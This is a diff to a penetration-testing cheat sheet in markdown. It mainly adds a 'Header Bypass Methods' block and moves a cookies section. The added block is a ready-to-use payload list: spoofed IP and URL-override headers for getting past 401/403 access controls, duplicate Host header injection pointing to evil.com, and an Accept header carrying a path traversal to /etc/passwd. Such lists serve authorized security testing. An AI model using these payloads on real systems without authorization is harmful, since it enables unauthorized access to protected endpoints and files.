@@ -210,11 +210,7 @@ finger batman@$ip
210
210
nikto -useproxy http://$ip:3128 -h $ip
211
211
```
212
212
213
- ### Cookies
214
-
215
- * [ https://cookiepedia.co.uk/ ] ( https://cookiepedia.co.uk/ )
216
- * "Largest Database of Pre-Categorized Cookies"
217
- * Scans a website for cookie usage
213
+ ## Headers
218
214
219
215
### HTTP Authorization headers
220
216
@@ -257,6 +253,110 @@ Authorization: AWS4-HMAC-SHA256 Credential=abc/20200618/us-east-1/execute-api/aw
257
253
* [ https://www.netsparker.com/whitepaper-http-security-headers/ ] ( https://www.netsparker.com/whitepaper-http-security-headers/ )
258
254
* [ https://owasp.org/www-project-secure-headers/ ] ( https://owasp.org/www-project-secure-headers/ )
259
255
256
+ ### Header Bypass Methods
257
+
258
+ ``` bash
259
+ # Add something like 127.0.0.1, localhost, 192.168.1.2, target.com or /admin, /console
260
+ Client-IP:
261
+ Connection:
262
+ Contact:
263
+ Forwarded:
264
+ From:
265
+ Host:
266
+ Origin:
267
+ Referer:
268
+ True-Client-IP:
269
+ X-Client-IP:
270
+ X-Custom-IP-Authorization:
271
+ X-Forward-For:
272
+ X-Forwarded-For:
273
+ X-Forwarded-Host:
274
+ X-Forwarded-Server:
275
+ X-Host:
276
+ X-Original-URL:
277
+ X-Originating-IP:
278
+ X-Real-IP:
279
+ X-Remote-Addr:
280
+ X-Remote-IP:
281
+ X-Rewrite-URL:
282
+ X-Wap-Profile:
283
+
284
+ # Try to repeat same Host header 2 times
285
+ Host: legit.com
286
+ Stuff: stuff
287
+ Host: evil.com
288
+
289
+ # Bypass type limit
290
+ Accept: application/json, text/javascript, * /* ; q=0.01
291
+ Accept: ../../../../../../../../../etc/passwd{{'
292
+
293
+ # Try to change the HTTP version from 1.1 to HTTP/0.9 and remove the host header
294
+
295
+ # 401/403 bypasses
296
+ # Whitelisted IP 127.0.0.1 or localhost
297
+ Client-IP: 127.0.0.1
298
+ Forwarded-For-Ip: 127.0.0.1
299
+ Forwarded-For: 127.0.0.1
300
+ Forwarded-For: localhost
301
+ Forwarded: 127.0.0.1
302
+ Forwarded: localhost
303
+ True-Client-IP: 127.0.0.1
304
+ X-Client-IP: 127.0.0.1
305
+ X-Custom-IP-Authorization: 127.0.0.1
306
+ X-Forward-For: 127.0.0.1
307
+ X-Forward: 127.0.0.1
308
+ X-Forward: localhost
309
+ X-Forwarded-By: 127.0.0.1
310
+ X-Forwarded-By: localhost
311
+ X-Forwarded-For-Original: 127.0.0.1
312
+ X-Forwarded-For-Original: localhost
313
+ X-Forwarded-For: 127.0.0.1
314
+ X-Forwarded-For: localhost
315
+ X-Forwarded-Server: 127.0.0.1
316
+ X-Forwarded-Server: localhost
317
+ X-Forwarded: 127.0.0.1
318
+ X-Forwarded: localhost
319
+ X-Forwared-Host: 127.0.0.1
320
+ X-Forwared-Host: localhost
321
+ X-Host: 127.0.0.1
322
+ X-Host: localhost
323
+ X-HTTP-Host-Override: 127.0.0.1
324
+ X-Originating-IP: 127.0.0.1
325
+ X-Real-IP: 127.0.0.1
326
+ X-Remote-Addr: 127.0.0.1
327
+ X-Remote-Addr: localhost
328
+ X-Remote-IP: 127.0.0.1
329
+
330
+ # Fake Origin - make GET request to accesible endpoint with:
331
+ X-Original-URL: /admin
332
+ X-Override-URL: /admin
333
+ X-Rewrite-URL: /admin
334
+ Referer: /admin
335
+ # Also try with absolute url https:/domain.com/admin
336
+
337
+ # Method Override
338
+ X-HTTP-Method-Override: PUT
339
+
340
+ # Provide full path GET
341
+ GET https://vulnerable-website.com/ HTTP/1.1
342
+ Host: evil-website.com
343
+
344
+ # Add line wrapping
345
+ GET /index.php HTTP/1.1
346
+ Host: vulnerable-website.com
347
+ Host: evil-website.com
348
+
349
+ # Wordlists
350
+ https://github.com/danielmiessler/SecLists/blob/master/Discovery/Web-Content/BurpSuite-ParamMiner/lowercase-headers
351
+ https://github.com/danielmiessler/SecLists/tree/bbb4d86ec1e234b5d3cfa0a4ab3e20c9d5006405/Miscellaneous/web/http-request-headers
352
+ ```
353
+
354
+ ## Cookies
355
+
356
+ * [https://cookiepedia.co.uk/](https://cookiepedia.co.uk/)
357
+ * "Largest Database of Pre-Categorized Cookies"
358
+ * Scans a website for cookie usage
359
+
260
360
## OpenVAS Vulnerability Scanner
261
361
262
362
```bash
0 commit comments